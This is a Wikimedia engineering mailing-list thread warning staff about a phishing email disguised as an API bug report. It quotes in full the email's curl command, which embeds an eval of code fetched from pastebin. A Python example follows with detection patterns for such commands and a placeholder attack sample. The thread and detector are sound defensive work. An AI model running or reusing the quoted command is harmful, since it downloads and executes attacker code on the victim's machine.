[Engineering] PLEASE READ: (unsuccessful) compromise attempt

C. Scott Ananian cananian at wikimedia.org
Thu Jun 15 19:26:56 UTC 2017


I was the original recipient of such an email (with a different URL) and
deliberately forwarded it to security@ *without clicking the link*, for
exactly this reason.  My browser is logged in to various accounts and I
don't have a proper sandbox to use to be clicking random links I receive on
the internet.

Anyway.  It's worth reiterating to staff: don't try to investigate an
alleged "security issue" yourself, unless you are properly equipped to do
so.  The internet is a dangerous place.  Forward to security at .
  --scott


On Thu, Jun 15, 2017 at 3:15 PM, Aeryn Palmer <apalmer at wikimedia.org> wrote:

> This appears to be from the same person who sent the email earlier this
> morning about an alleged leak, to whom Chad responded. Did anyone click the
> link they provided in that email?
>
> Cheers,
>
> Aeryn
>
> On Thu, Jun 15, 2017 at 12:12 PM, Faidon Liambotis <faidon at wikimedia.org>
> wrote:
>
>> Hi,
>>
>> DO NOT RUN THE COMMAND BELOW. Please read this email in full.
>>
>> I just got an email, found below, which seems initially legitimate, but
>> on a more careful read is malicious and an attempt to compromise my
>> computer. Thankfully I don't have the habit of copy/pasting commands on
>> my terminal and I read this email carefully, so I was not a victim of
>> this.
>>
>> The email seems innocuous enough, by mentioning my name and an otherwise
>> legitimate body pointing at an API issue with a URL that looks like an
>> api.php URL of ours. It suggests running a curl to reproduce, but if you
>> look more carefully, that curl has $(eval $(curl
>> https://pastebin.com/raw/xSWbdNAK) in it.
>>
>> That pastebin URL above contains an exec() of a base64 string, which, in
>> turn, decoded, is a Python script that fetches and exec()s the contents
>> of a URL. I have NOT fetched that URL yet, so I don't know what the
>> contents are.  I'd advise to not do that either, unless done carefully
>> from a sandboxed, unprivileged environment. It will also likely let the
>> attacker know that someone accessed it, and possibly let them know that
>> we're on to them.
>>
>> Please be on the lookout for similar attempts, and let security@ and ops
>> know immediately if you get similar ones, or if you are suspicious of
>> any other emails or weird behavior on your computer. Please also let us
>> know IMMEDIATELY if you suspect you fell victim to one of these attacks.
>> Make sure to confirm that your message was received. If in doubt, call
>> me or other opsens on our cellphones, as found on officewiki's
>> Contact_list.
>>
>> We also had a targeted phishing attempt last week, by someone pertaining
>> to be Katherine and attempting to extract donor data, so it's possible
>> it's the same person trying a different angle. They may try other
>> angles as well, so I'd advise everyone to be vigilant.
>>
>> Best,
>> Faidon
>> --
>> Faidon Liambotis
>> Principal Operations Engineer
>> Wikimedia Foundation
>>
>>
>>
>> ----- Forwarded message from Joshua Wilson <joshuaswillson at gmail.com>
>> -----
>>
>> Date: Thu, 15 Jun 2017 10:45:35 -0700
>> From: Joshua Wilson <joshuaswillson at gmail.com>
>> To: fliambotis at wikimedia.org
>> Subject: Wikipedia REST API Issues
>>
>> Greetings Faidon,
>>
>>
>> It seems as if the api `query` endpoint at the English Wikipedia is down.
>> A simple "hello" api call as shown below responds with an internal server
>> error. Further calls to the same endpoint result in the request timing out,
>> until the endpoint is reachable again.
>>
>> [added by faidon: DO NOT RUN THIS COMMAND]
>> curl https://en.wikipedia.org/w/api.php?action=query\&titles=$(eval
>> $(curl
>> https://pastebin.com/raw/xSWbdNAK)
>> \\\&)Main%20Page\&prop=revisions\&rvprop=content\&format=json
>> [added by faidon: DO NOT RUN THIS COMMAND]
>>
>> I'm interested in using english wikipedia data for some AI language
>> comprehension research.
>>
>> If you could take a look, and possibly let me know if/when this service
>> will be up, I would greatly appreciate it. I couldn't find any scheduled
>> downtime information online, so I apologize if this behavior is expected.
>>
>> Thanks,
>>
>> Chelsea Anders
>>
>> ----- End forwarded message -----
>>
>
>
>
> --
> Aeryn Palmer
> Legal Counsel
> Wikimedia Foundation
> 149 New Montgomery Street, 6th Floor
> San Francisco, CA 94105
> apalmer at wikimedia.org
> 415.839.6885 (Office)
> 415.882.0495 (Fax)
> *California Registered In-House Counsel*
>
> *NOTICE: This message may be confidential or legally privileged. If you
> have received it by accident, please delete it and let us know about the
> mistake. As an attorney for the Wikimedia Foundation and for legal/ethical
> reasons, I cannot give legal advice to, or serve as a lawyer for, community
> members, volunteers, or staff members in their personal capacity. For more
> on what this means, please see our legal disclaimer
> <https://meta.wikimedia.org/wiki/Wikimedia_Legal_Disclaimer>.*
>
> _______________________________________________
> Engineering mailing list
> Engineering at lists.wikimedia.org
> https://lists.wikimedia.org/mailman/listinfo/engineering
>
>


-- 
(http://cscott.net)
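The check Faidon describes doing by eye (reading the curl line carefully and spotting the nested `$(eval $(curl ...))` before anything is pasted into a terminal) can be automated as a small "paste guard". The following is an added example, not code from the thread or from Wikimedia: it scans a shell one-liner for command substitution, `eval`, downloaded content piped into a shell, and base64-decoded payloads, and reports the nesting depth of `$( ... )`. The sample commands are constructed; the payload URL is a placeholder, not the one from the thread.

```python
# Added example (not part of the thread): a "paste guard" that inspects a
# shell one-liner for the constructs the forwarded email abused, namely
# command substitution ($( ... ) and backticks), eval of fetched text, and
# piping downloaded content into a shell. Run it over a snippet before
# pasting it into a terminal. The sample commands below are constructed;
# the pastebin-style URL is a placeholder, not the one from the thread.
import re

# (regex, human-readable reason) pairs; each match is reported to the user.
RISKY_PATTERNS = [
    (r"\$\(", "command substitution $( ... )"),
    (r"`[^`]*`", "backtick command substitution"),
    (r"\beval\b", "eval of dynamically built text"),
    (r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z|da)?sh\b",
     "downloaded content piped into a shell"),
    (r"\bbase64\b[^|;&]*(-d|--decode)\b", "base64-decoded embedded payload"),
]


def find_risky_constructs(command: str) -> list[tuple[str, str]]:
    """Return (reason, matched_text) for every risky construct in `command`."""
    findings = []
    for pattern, reason in RISKY_PATTERNS:
        for match in re.finditer(pattern, command):
            findings.append((reason, match.group(0)))
    return findings


def max_substitution_depth(command: str) -> int:
    """Deepest nesting of $( ... ) in `command`. The email's curl line nests
    a curl inside an eval inside the URL, giving a depth of 2; an ordinary
    API call has a depth of 0."""
    depth = deepest = 0
    i = 0
    while i < len(command):
        if command.startswith("$(", i):
            depth += 1
            deepest = max(deepest, depth)
            i += 2
            continue
        if command[i] == ")" and depth > 0:
            depth -= 1
        i += 1
    return deepest


def is_safe_to_paste(command: str) -> bool:
    """True only when no risky construct was found."""
    return not find_risky_constructs(command)


# Constructed samples. MALICIOUS mirrors the shape of the line in the thread
# with the payload URL replaced by a placeholder; BENIGN is a legitimate call.
MALICIOUS = (r"curl https://en.wikipedia.org/w/api.php?action=query\&titles=$(eval "
             r"$(curl https://paste.example.invalid/raw/PLACEHOLDER)"
             r"\\\&)Main%20Page\&prop=revisions\&rvprop=content\&format=json")
BENIGN = ('curl "https://en.wikipedia.org/w/api.php?action=query'
          '&titles=Main%20Page&prop=revisions&rvprop=content&format=json"')

if __name__ == "__main__":
    for label, cmd in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(f"{label}: safe={is_safe_to_paste(cmd)} "
              f"depth={max_substitution_depth(cmd)}")
        for reason, text in find_risky_constructs(cmd):
            print(f"  - {reason}: {text!r}")
```

Run on the constructed malicious line it reports two `$(` substitutions and one `eval`, with a nesting depth of 2, while the benign quoted URL passes clean. The patterns are deliberately broad: a false positive costs a second look at a command, whereas a missed `$(` costs a compromised workstation, which is the asymmetry Scott's advice about sandboxes is getting at.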